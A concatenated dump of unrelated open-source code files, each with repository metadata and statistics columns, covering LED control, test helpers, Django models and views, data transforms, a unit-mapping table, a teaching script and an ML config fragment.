#reset for some issue
mystrip.setPixelColor(0, 10, 0, 0) #setPixelColor(id, r, g, b)
mystrip.setPixelColor(1, 0, 10, 0) #r,g,b value is from 0 to 255
mystrip.setPixelColor(2, 0, 0, 10) #But, values larger than 20
mystrip.setPixelColor(3, 10, 10, 10) #are almost same.
mystrip.show()
time.sleep(1)
| 27.933333 | 64 | 0.735084 | 74 | 419 | 4.135135 | 0.540541 | 0.261438 | 0.026144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118785 | 0.136038 | 419 | 14 | 65 | 29.928571 | 0.726519 | 0.27685 | 0 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.230769 | null | null | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9c665805d7696bcada249e943775428acb0844d | 2,699 | py | Python | scenarios/scenario_tests/pytest/scenario_test_support.py | sconover/rules_intellij_generate | f738a6306637b72a04ff80a0dfd9e70980bb08c1 | [
"Apache-2.0"
] | 11 | 2017-12-18T06:23:32.000Z | 2021-07-20T20:10:43.000Z | scenarios/scenario_tests/pytest/scenario_test_support.py | sconover/rules_intellij_generate | f738a6306637b72a04ff80a0dfd9e70980bb08c1 | [
"Apache-2.0"
] | 1 | 2021-05-22T02:43:51.000Z | 2021-05-22T02:43:51.000Z | scenarios/scenario_tests/pytest/scenario_test_support.py | sconover/rules_intellij_generate | f738a6306637b72a04ff80a0dfd9e70980bb08c1 | [
"Apache-2.0"
] | 4 | 2019-04-14T05:10:15.000Z | 2021-12-12T19:47:33.000Z | import xml.etree.ElementTree as ET
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
def is_bazel_run():
return "TEST_WORKSPACE" in os.environ
def read_file(path):
f = open(path, "r")
content = f.read()
f.close()
return content
def parse_xml(xml_str):
return ET.fromstring(xml_str)
def xpath_list(xml_str, xpath):
return parse_xml(xml_str).findall(xpath)
# unfortunately ElementTree doesn't handle returning xpath attribute values, this is a workaround.
def xpath_attribute_list(xml_str, xpath, attribute_name):
return list(map(lambda e: e.get(attribute_name), parse_xml(xml_str).findall(xpath)))
def generated_file_path(relative_path):
return relative_path \
if is_bazel_run() \
else os.path.join(dir_path, "../../bazel-bin/%s" % relative_path)
def load_archive(intellij_files_archive_path):
intellij_files_archive_path = generated_file_path(intellij_files_archive_path)
entries = read_file(intellij_files_archive_path) \
.split("__SYMLINK_DIVIDER__\n", 1)[0] \
.split("__SHA1_DIVIDER__\n", 1)[1] \
.split("\n__FILE_DIVIDER__\n")
relative_path_to_content = {}
for entry in entries:
parts = entry.split("\n", 1)
relative_path_to_content[parts[0]] = parts[1]
return relative_path_to_content
def find_all_plain_jar_libraries(iml_content):
return list(map(lambda e: e.find("./library/CLASSES/root").get("url"),
filter(lambda e: e.get("type") == "module-library" and "scope" not in e.keys(),
parse_xml(iml_content).findall("./component/orderEntry"))))
def find_all_test_jar_libraries(iml_content):
return list(map(lambda e: e.find("./library/CLASSES/root").get("url"),
filter(lambda e: e.get("type") == "module-library" and e.get("scope") == "TEST",
parse_xml(iml_content).findall("./component/orderEntry"))))
def junit5_jars():
return [
"jar://${BAZEL_INFO_EXECUTION_ROOT}/external/org_apiguardian_apiguardian_api/jar/apiguardian-api-1.0.0.jar!/",
"jar://${BAZEL_INFO_EXECUTION_ROOT}/external/org_junit_jupiter_junit_jupiter_api/jar/junit-jupiter-api-5.0.1.jar!/",
"jar://${BAZEL_INFO_EXECUTION_ROOT}/external/org_junit_platform_junit_platform_commons/jar/junit-platform-commons-1.0.1.jar!/",
"jar://${BAZEL_INFO_EXECUTION_ROOT}/external/org_junit_platform_junit_platform_engine/jar/junit-platform-engine-1.0.1.jar!/",
"jar://${BAZEL_INFO_EXECUTION_ROOT}/external/org_junit_platform_junit_platform_launcher/jar/junit-platform-launcher-1.0.1.jar!/",
"jar://${BAZEL_INFO_EXECUTION_ROOT}/external/org_opentest4j_opentest4j/jar/opentest4j-1.0.0.jar!/"]
| 39.115942 | 137 | 0.714709 | 391 | 2,699 | 4.603581 | 0.2711 | 0.065 | 0.04 | 0.07 | 0.424444 | 0.393333 | 0.352778 | 0.332778 | 0.280556 | 0.256111 | 0 | 0.012959 | 0.142275 | 2,699 | 68 | 138 | 39.691176 | 0.764579 | 0.035569 | 0 | 0.085106 | 0 | 0.106383 | 0.356017 | 0.306421 | 0 | 0 | 0 | 0 | 0 | 1 | 0.212766 | false | 0 | 0.042553 | 0.170213 | 0.468085 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
b9d6c8fb02553487069b9e41f357cee4621f0de5 | 744 | py | Python | backend/pages/views/__init__.py | appheap/social-media-analyzer | 0f9da098bfb0b4f9eb38e0244aa3a168cf97d51c | [
"Apache-2.0"
] | 5 | 2021-09-11T22:01:15.000Z | 2022-03-16T21:33:42.000Z | backend/pages/views/__init__.py | iamatlasss/social-media-analyzer | 429d1d2bbd8bfce80c50c5f8edda58f87ace668d | [
"Apache-2.0"
] | null | null | null | backend/pages/views/__init__.py | iamatlasss/social-media-analyzer | 429d1d2bbd8bfce80c50c5f8edda58f87ace668d | [
"Apache-2.0"
] | 3 | 2022-01-18T11:06:22.000Z | 2022-02-26T13:39:28.000Z | from .homepage_view import HomePageView
from .bad_request_view import bad_request
from .page_not_found_view import page_not_found
from .permission_denied_view import permission_denied
from .server_error_view import server_error
from .error_pages import ERROR_PAGE_TEMPLATE
from .error_pages import ERROR_400_TEMPLATE_NAME
from .error_pages import ERROR_403_TEMPLATE_NAME
from .error_pages import ERROR_404_TEMPLATE_NAME
from .error_pages import ERROR_500_TEMPLATE_NAME
__all__ = [
'ERROR_PAGE_TEMPLATE',
'ERROR_400_TEMPLATE_NAME',
'ERROR_403_TEMPLATE_NAME',
'ERROR_404_TEMPLATE_NAME',
'ERROR_500_TEMPLATE_NAME',
'HomePageView',
'bad_request',
'page_not_found',
'permission_denied',
'server_error',
]
| 27.555556 | 53 | 0.810484 | 104 | 744 | 5.25 | 0.211538 | 0.175824 | 0.128205 | 0.18315 | 0.294872 | 0.203297 | 0.203297 | 0 | 0 | 0 | 0 | 0.037152 | 0.13172 | 744 | 26 | 54 | 28.615385 | 0.80805 | 0 | 0 | 0 | 0 | 0 | 0.237903 | 0.123656 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.454545 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
b9da4fb3de6343b9e94b5d60079f304adeafa6c7 | 628 | py | Python | pycytools/transformations.py | BodenmillerGroup/pycytools | a79ed661a672fa15831830efa9c4c3bb7018b29d | [
"BSD-3-Clause"
] | null | null | null | pycytools/transformations.py | BodenmillerGroup/pycytools | a79ed661a672fa15831830efa9c4c3bb7018b29d | [
"BSD-3-Clause"
] | null | null | null | pycytools/transformations.py | BodenmillerGroup/pycytools | a79ed661a672fa15831830efa9c4c3bb7018b29d | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
def logtransf_data(x, offset=None):
"""
Log transformation with a small value added
To deal with 0's, either add a small offset manually
or add the minimal non zero value.
:param x: values
:param offset: An offset, set to 0 for no offset.
:return: Transformed values
"""
if offset is None:
offset = min(x[x > 0])
return (np.log10(x + offset))
def asinhtransf_data(x, cof=5):
"""
Asinh transformation accoring to
asinh(x/cof)
:param x: values
:param cof: cofactor
:return: transformed values
"""
return np.arcsinh(x / cof)
| 20.933333 | 56 | 0.632166 | 92 | 628 | 4.293478 | 0.521739 | 0.03038 | 0.060759 | 0.086076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013158 | 0.273885 | 628 | 29 | 57 | 21.655172 | 0.85307 | 0.542994 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.142857 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b9dc36defe7e49a2efe78bc5cac9fe6db8346f81 | 216 | py | Python | tests/conftest.py | zrong/pyzog | 52becead7035fb4b5572107c60a7278ebbfda393 | [
"BSD-3-Clause"
] | null | null | null | tests/conftest.py | zrong/pyzog | 52becead7035fb4b5572107c60a7278ebbfda393 | [
"BSD-3-Clause"
] | null | null | null | tests/conftest.py | zrong/pyzog | 52becead7035fb4b5572107c60a7278ebbfda393 | [
"BSD-3-Clause"
] | null | null | null | from pathlib import Path
import pyzog
from pyzog.receiver import Receiver
import pytest
port = 5011
@pytest.fixture(scope='session')
def receiver():
r = Receiver(5011, pyzog.here.joinpath('logs'))
yield r
| 16.615385 | 51 | 0.736111 | 30 | 216 | 5.3 | 0.6 | 0.176101 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044199 | 0.162037 | 216 | 12 | 52 | 18 | 0.834254 | 0 | 0 | 0 | 0 | 0 | 0.050926 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.444444 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b9dd39b14ef023e9ea027e7c4c53141da20615e2 | 6,222 | py | Python | tracing/tracing/value/legacy_unit_info.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 1,894 | 2015-04-17T18:29:53.000Z | 2022-03-28T22:41:06.000Z | tracing/tracing/value/legacy_unit_info.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 4,640 | 2015-07-08T16:19:08.000Z | 2019-12-02T15:01:27.000Z | tracing/tracing/value/legacy_unit_info.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 698 | 2015-06-02T19:18:35.000Z | 2022-03-29T16:57:15.000Z | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Python port of legacy_unit_info.html. This is a mapping of various units
# reported by gtest perf tests to histogram units, including improvement
# direction and conversion factors.
# Note that some of the converted names don't match up exactly with the ones
# in the HTML file, as unit names are sometimes different between the two
# implementations. For example, timeDurationInMs in the JavaScript
# implementation is ms in the Python implementation.
IMPROVEMENT_DIRECTION_DONT_CARE = ''
IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER = '_smallerIsBetter'
IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER = '_biggerIsBetter'
class LegacyUnit(object):
"""Simple object for storing data to improve readability."""
def __init__(self, name, improvement_direction, conversion_factor=1):
assert improvement_direction in [
IMPROVEMENT_DIRECTION_DONT_CARE,
IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER,
IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER]
self._name = name
self._improvement_direction = improvement_direction
self._conversion_factor = conversion_factor
@property
def name(self):
return self._name + self._improvement_direction
@property
def conversion_factor(self):
return self._conversion_factor
def AsTuple(self):
return self.name, self.conversion_factor
LEGACY_UNIT_INFO = {
'%': LegacyUnit('n%', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_DONT_CARE),
'Celsius': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'Hz': LegacyUnit('Hz', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'KB': LegacyUnit('sizeInBytes', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER,
conversion_factor=1024),
'MB': LegacyUnit('sizeInBytes', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER,
conversion_factor=(1024 * 1024)),
'ObjectsAt30FPS': LegacyUnit('unitless',
IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'available_kB': LegacyUnit('sizeInBytes',
IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER,
conversion_factor=1024),
'bit/s': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'bytes': LegacyUnit('sizeInBytes', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'chars/s': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'commit_count': LegacyUnit('count', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'count': LegacyUnit('count', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'coverage%': LegacyUnit('n%', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'dB': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'files': LegacyUnit('count', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'fps': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'frame_count': LegacyUnit('count', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'frame_time': LegacyUnit('ms', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'frames': LegacyUnit('count', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'garbage_collections': LegacyUnit('count',
IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'idle%': LegacyUnit('n%', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'janks': LegacyUnit('count', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'lines': LegacyUnit('count', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'mWh': LegacyUnit('J', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER,
conversion_factor=3.6),
'milliseconds': LegacyUnit('ms', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'milliseconds-per-frame': LegacyUnit(
'ms', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'minutes': LegacyUnit('msBestFitFormat',
IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER,
conversion_factor=60000),
'mips': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'mpixels_sec': LegacyUnit('unitless',
IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'ms': LegacyUnit('ms', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'mtri_sec': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'mvtx_sec': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'objects (bigger is better)': LegacyUnit(
'count', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'packets': LegacyUnit('count', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'percent': LegacyUnit('n%', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'points': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'ports': LegacyUnit('count', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'reduction%': LegacyUnit('n%', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'relocs': LegacyUnit('count', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'runs/s': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'score (bigger is better)': LegacyUnit(
'unitless', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'seconds': LegacyUnit('ms', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER,
conversion_factor=1000),
'tokens/s': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_BIGGER_IS_BETTER),
'tasks': LegacyUnit('unitless', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER),
'us': LegacyUnit('msBestFitFormat', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER,
conversion_factor=0.001),
'ns': LegacyUnit('msBestFitFormat', IMPROVEMENT_DIRECTION_SMALLER_IS_BETTER,
conversion_factor=0.000001),
}
# Add duplicate units here
LEGACY_UNIT_INFO['frames-per-second'] = LEGACY_UNIT_INFO['fps']
LEGACY_UNIT_INFO['kb'] = LEGACY_UNIT_INFO['KB']
LEGACY_UNIT_INFO['ms'] = LEGACY_UNIT_INFO['milliseconds']
LEGACY_UNIT_INFO['runs_per_s'] = LEGACY_UNIT_INFO['runs/s']
LEGACY_UNIT_INFO['runs_per_second'] = LEGACY_UNIT_INFO['runs/s']
LEGACY_UNIT_INFO['score'] = LEGACY_UNIT_INFO['score (bigger is better)']
LEGACY_UNIT_INFO['score_(bigger_is_better)'] = LEGACY_UNIT_INFO['score']
| 54.104348 | 80 | 0.742205 | 691 | 6,222 | 6.267728 | 0.231548 | 0.272454 | 0.168321 | 0.18079 | 0.700993 | 0.634265 | 0.621335 | 0.251905 | 0.13692 | 0.090279 | 0 | 0.008598 | 0.158791 | 6,222 | 114 | 81 | 54.578947 | 0.818877 | 0.108807 | 0 | 0.086957 | 0 | 0 | 0.147585 | 0.00832 | 0 | 0 | 0 | 0 | 0.01087 | 1 | 0.043478 | false | 0 | 0 | 0.032609 | 0.086957 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9ddc83169b14b7bdc39b01f3656cac042e9bffa | 679 | py | Python | djsc_sandbox/myapp/models.py | lorinkoz/django-js-choices | f6235b0339ce5ba1aa1a467548b00bcc46317fff | [
"MIT"
] | 17 | 2017-06-09T18:01:48.000Z | 2021-07-19T17:56:49.000Z | djsc_sandbox/myapp/models.py | lorinkoz/django-js-choices | f6235b0339ce5ba1aa1a467548b00bcc46317fff | [
"MIT"
] | 3 | 2020-07-25T21:29:29.000Z | 2021-07-15T16:33:22.000Z | djsc_sandbox/myapp/models.py | lorinkoz/django-js-choices | f6235b0339ce5ba1aa1a467548b00bcc46317fff | [
"MIT"
] | 5 | 2017-06-12T17:59:14.000Z | 2021-03-18T08:23:15.000Z | from django.db import models
from multiselectfield.db import fields as multiselect
from .choices import MEDAL_TYPES, MEDIA_CHOICES, YEAR_IN_SCHOOL_CHOICES
class ModelA(models.Model):
year_in_school = models.CharField(max_length=2, blank=True, choices=YEAR_IN_SCHOOL_CHOICES)
class ModelB(models.Model):
year_in_school = models.CharField(max_length=2, blank=True, choices=YEAR_IN_SCHOOL_CHOICES[:-1])
media = models.CharField(max_length=10, blank=True, choices=MEDIA_CHOICES)
class ModelC(models.Model):
medals = multiselect.MultiSelectField(blank=True, choices=MEDAL_TYPES)
media = models.CharField(max_length=10, blank=True, choices=MEDIA_CHOICES)
| 30.863636 | 100 | 0.793814 | 96 | 679 | 5.385417 | 0.3125 | 0.058027 | 0.116054 | 0.185687 | 0.618956 | 0.618956 | 0.549323 | 0.549323 | 0.549323 | 0.549323 | 0 | 0.011609 | 0.111929 | 679 | 21 | 101 | 32.333333 | 0.845771 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.272727 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b9e513db68a2e978f0e433b03bd9bdced9806bc4 | 209 | py | Python | job/Werewolf.py | momijiariari/solid-disco | 6c8f406f2701e0bda3fe83cbc9f90900a0ba78fd | [
"MIT"
] | null | null | null | job/Werewolf.py | momijiariari/solid-disco | 6c8f406f2701e0bda3fe83cbc9f90900a0ba78fd | [
"MIT"
] | null | null | null | job/Werewolf.py | momijiariari/solid-disco | 6c8f406f2701e0bda3fe83cbc9f90900a0ba78fd | [
"MIT"
] | null | null | null | from job.Job import Job
class Werewolf(Job):
def __init__(self):
super().__init__()
super().setName('werewolf')
super().setDisplayName('**人狼**')
super().IamWerewolf(True)
| 20.9 | 40 | 0.593301 | 22 | 209 | 5.272727 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.239234 | 209 | 9 | 41 | 23.222222 | 0.72956 | 0 | 0 | 0 | 0 | 0 | 0.066986 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9e76e3fb0ecb553f3db51239c13e0fa9392e084 | 3,047 | py | Python | src/m2e_overloading_plus.py | whitemg1/12-MoreSequences | 5494fe7c9e9468a520062647c31f9036fbcd508f | [
"MIT"
] | null | null | null | src/m2e_overloading_plus.py | whitemg1/12-MoreSequences | 5494fe7c9e9468a520062647c31f9036fbcd508f | [
"MIT"
] | null | null | null | src/m2e_overloading_plus.py | whitemg1/12-MoreSequences | 5494fe7c9e9468a520062647c31f9036fbcd508f | [
"MIT"
] | null | null | null | """
This module demonstrates OVERLOADING the + symbol:
-- With numbers as operands, it means addition (as in arithmetic)
-- With sequences as operands, it means concatenation, that is,
forming a new sequence that stitches together its operands.
This module also demonstrates the STR function.
Authors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,
Mark Hays, Amanda Stouder, Aaron Wilkin, and their colleagues.
"""
# -----------------------------------------------------------------------------
# Students: Read and run this program. There is nothing else
# for you to do in here. Just use it as an example.
# Before you leave this example,
# *** MAKE SURE YOU UNDERSTAND: ***
# *** -- What it means to use + for CONCATENATION ***
# *** -- What the str function does. ***
# -----------------------------------------------------------------------------
def main():
""" Demonstrates OVERLOADING the + symbol. """
# -------------------------------------------------------------------------
# First example below: computes 5 + 33 (addition, as in arithmetic)
# Second example below: stitches together the two lists.
# Third example below: stitches together the three tuples.
# Fourth example below: stitches together the four strings.
# Fifth example: contrasts concatenation with addition.
# -------------------------------------------------------------------------
print()
print('-----------------------------------------------------------')
print('Addition, then various forms of concatenation:')
print('-----------------------------------------------------------')
print(5 + 33)
print([4, 3] + [1, 7, 2, 4])
print((4, 1, 7) + (444,) + (3, 3))
print('hello' + 'Dave' + '55' + '83')
print(5 + 33, '5' + '33')
# -------------------------------------------------------------------------
# The str function and the concatenation form of the + operator
# are handy for making strings from sub-strings. For example:
# -------------------------------------------------------------------------
x = 51
y = 3
z = 40
print()
print('-----------------------------------------------------------')
print('With and (using string concatenation) without spaces:')
print('-----------------------------------------------------------')
# -------------------------------------------------------------------------
# Printing multiple items puts spaces between the items.
# That is usually what you want.
# -------------------------------------------------------------------------
print(x, y, z)
# -------------------------------------------------------------------------
# But if you don't want spaces
# (or want to otherwise format the string result):
# -------------------------------------------------------------------------
x = []
for k in range(5):
x = x + [(2 * k)]
print(x) | 43.528571 | 79 | 0.407942 | 267 | 3,047 | 4.655431 | 0.505618 | 0.040225 | 0.033789 | 0.067578 | 0.074819 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015152 | 0.198556 | 3,047 | 70 | 80 | 43.528571 | 0.493857 | 0.710207 | 0 | 0.272727 | 0 | 0 | 0.415877 | 0.279621 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0 | 0 | 0.045455 | 0.681818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
b9eb28c9021295f9a5bdd66135e908bb25548ca7 | 672 | py | Python | crypto_1_backtester/backtester_v1.py | Megalinux/Crypto_1_Backtester | 25d32831a1fd77f914f3b6d9f382366350447fdb | [
"MIT"
] | null | null | null | crypto_1_backtester/backtester_v1.py | Megalinux/Crypto_1_Backtester | 25d32831a1fd77f914f3b6d9f382366350447fdb | [
"MIT"
] | null | null | null | crypto_1_backtester/backtester_v1.py | Megalinux/Crypto_1_Backtester | 25d32831a1fd77f914f3b6d9f382366350447fdb | [
"MIT"
] | null | null | null | import pandas as pd
import sys
import talib as ta
from talib import MA_Type
import matplotlib.pyplot as plt
import numpy as np
import mysql.connector as mysql
import itertools
from itertools import combinations
from itertools import permutations
import re
import candlestick
import tools
import strategy
def AvvioBacktester():
exchange = sys.argv[1] #example: poloniex
pair = sys.argv[2] #example: 'BTC/ETH'
risultato = []
tool = tools.Tools()
strat = strategy.StrategyTrendFollowing()
strat.ExecuteTrendFollowing(exchange, pair, tool, risultato)
a = sorted(risultato, key=lambda a_entry: a_entry[2])
print(a)
AvvioBacktester()
| 19.2 | 64 | 0.747024 | 88 | 672 | 5.670455 | 0.522727 | 0.052104 | 0.076152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005445 | 0.18006 | 672 | 34 | 65 | 19.764706 | 0.900181 | 0.052083 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.583333 | 0 | 0.625 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b9fca5c3bb8d4bf39dbe6c5492c7072e15aa7000 | 229 | py | Python | bucket_C0/python-anyjson/patches/patch-setup.py | jrmarino/ravensource | 91d599fd1f2af55270258d15e72c62774f36033e | [
"FTL"
] | 17 | 2017-04-22T21:53:52.000Z | 2021-01-21T16:57:55.000Z | bucket_C0/python-anyjson/patches/patch-setup.py | jrmarino/ravensource | 91d599fd1f2af55270258d15e72c62774f36033e | [
"FTL"
] | 186 | 2017-09-12T20:46:52.000Z | 2021-11-27T18:15:14.000Z | bucket_C0/python-anyjson/patches/patch-setup.py | jrmarino/ravensource | 91d599fd1f2af55270258d15e72c62774f36033e | [
"FTL"
] | 74 | 2017-09-06T14:48:01.000Z | 2021-08-28T02:48:27.000Z | --- setup.py.orig 2012-06-21 22:59:59 UTC
+++ setup.py
@@ -2,8 +2,6 @@ import os
import sys
extra = {}
-if sys.version_info >= (3, 0):
- extra.update(use_2to3=True)
try:
from setuptools import setup, find_packages
| 19.083333 | 48 | 0.628821 | 39 | 229 | 3.615385 | 0.769231 | 0.099291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.120219 | 0.200873 | 229 | 11 | 49 | 20.818182 | 0.650273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.333333 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
b9ffd8eba0545d9b259c6db9b02b18030c403fcd | 262 | py | Python | configs/faster_rcnn_voc/faster_rcnn_r50_fpn_1x_voc_moco_lr16.py | zhaoyang97/mmdetection | 93ce0e7b735ad1ed2e7d856ef80e3aa598cb47e5 | [
"Apache-2.0"
] | null | null | null | configs/faster_rcnn_voc/faster_rcnn_r50_fpn_1x_voc_moco_lr16.py | zhaoyang97/mmdetection | 93ce0e7b735ad1ed2e7d856ef80e3aa598cb47e5 | [
"Apache-2.0"
] | null | null | null | configs/faster_rcnn_voc/faster_rcnn_r50_fpn_1x_voc_moco_lr16.py | zhaoyang97/mmdetection | 93ce0e7b735ad1ed2e7d856ef80e3aa598cb47e5 | [
"Apache-2.0"
] | null | null | null | _base_ = [
'../_base_/models/faster_rcnn_r50_fpn_moco.py',
'../_base_/datasets/vocdataset_voc0712.py',
